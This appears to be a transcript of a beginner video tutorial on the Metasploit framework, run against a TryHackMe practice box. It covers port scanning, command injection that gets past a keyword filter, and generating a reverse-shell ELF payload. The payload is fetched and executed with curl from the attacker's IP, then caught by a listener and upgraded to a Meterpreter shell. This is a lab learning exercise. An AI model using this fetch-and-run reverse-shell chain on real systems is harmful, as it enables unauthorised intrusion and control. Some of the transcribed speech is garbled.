So hey guys, back again. This is Smiths, and today in this video we are going to introduce the Metasploit framework, and we're going to see what the framework is and why it is so famous. And without any further ado, let's get started in the video. Okay, so there is the name framework. So what do you mean by the name framework? So the framework means it is itself not a tool, but it consists of a lot of the tools. That means the Metasploit framework has a lot of tools inside itself, and as this is the official Metasploit documentation, as it says, there are the modules. First one is the auxiliary modules, which are used for scanning, and there is different types of scanning, not only port scanning. There are a lot of types of scans. So there are 1289 modules. Then there is encoders, then there's antivirus evasions, then there's exploits 2499. This is the main thing of Metasploit, why it is famous, because of the exploitation. Then there's knobs and payloads, and we can generate payloads from within Metasploit framework, but we can also generate them directly through the command line using a tool called msfvenom, which is also the part of Metasploit framework, and we will cover it in the next video. But in this video we are going to generate Metasploit payloads directly from the framework itself. Then there's post-exploitation, and that concludes the Metasploit framework. So to get a practical overview of what Metasploit framework is, at first let's just open a terminal and we type the main command which will get us into the Metasploit framework. That is msfconsole. And it may take some time because it's very heavyweight. It may take some time, so please be patient and wait for the console to load. And apparently it has loaded, and we will get a prompt soon. Let's say that would say msf6, and let's just wait. So we have the prompt here. This is the prompt. So first of all, let's just clear the screen out. So there's a lot of commands in Metasploit framework. First we type in help, and we get all of this so much long list of commands. But let's just get right through it. So in order to understand Metasploit framework fully, let's just spawn up a tryhackme box. So tryhackme.com, then there's room, and I have the chill hack, which is one of the best box in tryhackme for beginners. And I think I have already spawned it up. Let's just see. Okay, so it is loaded. I have already spawned it up, and this is the IP address. So first of all, let's open a new terminal and connect the VPN. Okay, and make sure we can ping it. So first of all, let's just go with the port scanning. So the first command is search. So let's just write port scan. So we have a lot of auxiliaries, because auxiliaries, as I said, are used for scanning ports, and we have this auxiliary scanner portscan TCP. We can also use the SYN-scan, which is the Nmap default, but for now we will go for TCP, and later we will also see the SYN-scan. So first of all, the second command is to use the number, or you can also mention the whole path, but now we will go for the number. And there is an options. This is the command to list all the options. So okay, then there's the ports. So we want to set the ports. There is the network ports, then there is 20 to 25, then we want 80, and then we want 80. So these are all the default ports. I hope should be open. So let's see which ports are open, and we want the R host, that means the target host which we want to scan, and that's not 173, that's this IP address here. So let it run, and it says 21 port is open, 80 is open, and 22, that is SSH, is open. This is FTP open, and 80 for HTTP. Let's just get back and let's get to the web server. And because I have already solved the box, I will show you the main path. That is a directory called secret. So after we go into that directory, and let me turn off dark reader, that is already off. So just execute a command, who am I, and we have www data. So we have command injection, but there is some filterings. So like if I, let's say, cat etc os release, it will say are you a hacker. So there is a lot of commands. If I type in like ls, it will say are you a hacker. If I type in dir, it will not say. Hopefully, yes, it doesn't say. So this is how it all works. So to get a shell, I believe that the normal reverse shell one-liners won't work. So let's see if curl is present. Which curl? We have curl present here inside the path variable. So what we do is to simply search for payload Linux shell underscore reverse underscore TCP, and I have already explained what this syntax means, so I'm not going to explain it now. We will cover it again in the MSF Venom video. So now we want to use this or this. The difference is, do we have x64 or do we have x86? To see that, we have a command uname-a, and it says it is x86 64. That means it is a 64-bit machine. So we will go for this payload and use, and options, we want to set the L host to turn 1, that is this tryhackme IP address, and set L port to what it is. We don't want to change it for now, and we want to generate, the format will be elf, that is the Linux executable, and the output file will be /temp/shell. Let it generate, and till then, if you have any background noises, please ignore it. So do we have temp shell? Yes, we have file/temp shell. It is L64-bit executable. So now let's go to temp and serve it online. So curl and we have the command 10.17.33.21/shell/o/temp/shell. that is the command. If you know curl, this is I think the very basic. So curl is a command line utility which allows us to make web requests from the terminal. Then this is the IP address, then the file name is shell. So and we write the contents into /temp/shell. So okay, that is how we download files through Linux. And we chmod, that means give it executable permissions /temp/shell. okay, and then we just execute it. But first let us start the listener. For that we want to use exploit/multi/handler, and we are in the multi-handler options. Set lhost to turn1 and set payload to this, and just remove the payload part, and we are good to go. Run, and it shall take some time to spawn up the server, so please wait. Please ignore any background noises, please. This is night time and I know the noises are less now, but it is what it is. So the server has started on this IP address on the port 4444, as we have stated in the beacon, and when we execute it we should get a shell. So wait, and we have got a shell. So where am I? www.data id, and we want to background it, and yes. So until now we have scanned the host that is a part of from auxiliary, then we have exploited it. So that is a part of exploit, that is this multi-handler, that is the listener from exploit module. Then there's all sorts of exploits which you will see as you get older or you get more experience with the framework. So it will be very crucial in your pen testing journey. And for now I am going to show a last bit of the cheesiness, that is the post-exploitation module, a very special module. It's called shell to Meterpreter. So if you know what Meterpreter is, so you know, but if you don't know, let me tell you what Meterpreter is. But first let's select this module, because this is the module, that is post multi manage shell to Meterpreter, and use this module. And let's clear the screen. Now let me tell you what this Meterpreter thing is. So you know, there is a normal shell which looks like something like this, okay, where we type commands. Metasploit framework provides you with a special kind of shell which has a lot of commands which are not permitted by bash. So it has it is like there is certain commands which make all of the hard work easier. So there is a lot of commands which you can actually do from Meterpreter. Then, and I will show you some of the commands which may not work for this case, because it is of course a try hack me box, but there is a lot of fun commands. So it is a special shell, that is all you have to know for now. So let's get on to options, and we set the lhost to turn1, and sessions, we have only one session, that is set session 2 1, and I think we are good to go. And see what we are changing is the L host and the session. So though L host is not required, but we will just give it. Okay, so it will try to auto detect, but let's just give it for just clarification. Then there's L pod and leave it what it is. Then there's session, so clear it out. So then just run and just wait and watch. Please ignore the background noises because I don't know, I have to deal with it. I see it is already 12 o'clock in the midnight, but there's all people working in our house. So I think we are good to go. Sessions, and we have the Meterpreter session. So sessions, to interact with the session we have -I, that is -interact command, the -interact option. Then there's 2 session ID, and we have got the Meterpreter session. What we can do with the Meterpreter session? First, the command is get UID, which will say the server username, which is www.data, that is what user we are. Now clear doesn't work, but control L works. So then there's help, and then there's a lot of commands. See, these are the webcam commands: webcam chat, webcam list, webcam snap, take a snapshot from the specified webcam, play a video stream from the specified webcam. So these are all the things which Metasploit framework can do, but the thing is webcam is not installed in this machine, so we cannot do that. Then there is a shell command which will drop us into a command shell. Let's just run the shell command and type in who am I, data, ls, this, exit, we get to the Meterpreter. Okay, clear, doesn't work. Execute means execute a command, get PID, get N, get UID, kill, pgrep, pkill, ps. All of these commands have their specific descriptions. Then there's networking commands, then there's file system commands, all of this. Then there's core commands. So there's a lot of fun things you can do with Meterpreter shell. So one of the commands is sysinfo, which we generally like to see. It says the computer IP address, the OS architecture, then this build tuple, leave it, then there's Meterpreter version. So that is all which we can do for now, and I think it concludes the video now. We have introduced Meterpreter fully in this video, and I think you have a basic idea of what Metasploit is and what it is capable of. And I know that Metasploit is one of the most beginner friendly C2 frameworks, or C2 is abbreviation for command and control frameworks. So most beginner friendly C2 frameworks, apparently the most detectable one, but it creates the base for pen testers. So it's very crucial to learn it, and this video I hope has worked for a nice introduction to Metasploit framework, and I hope that you will utilize this framework for a good purpose and learning in your pen testing path. So that's all for this video, and I will see you in the next video. Till then, take care, bye bye, signing off.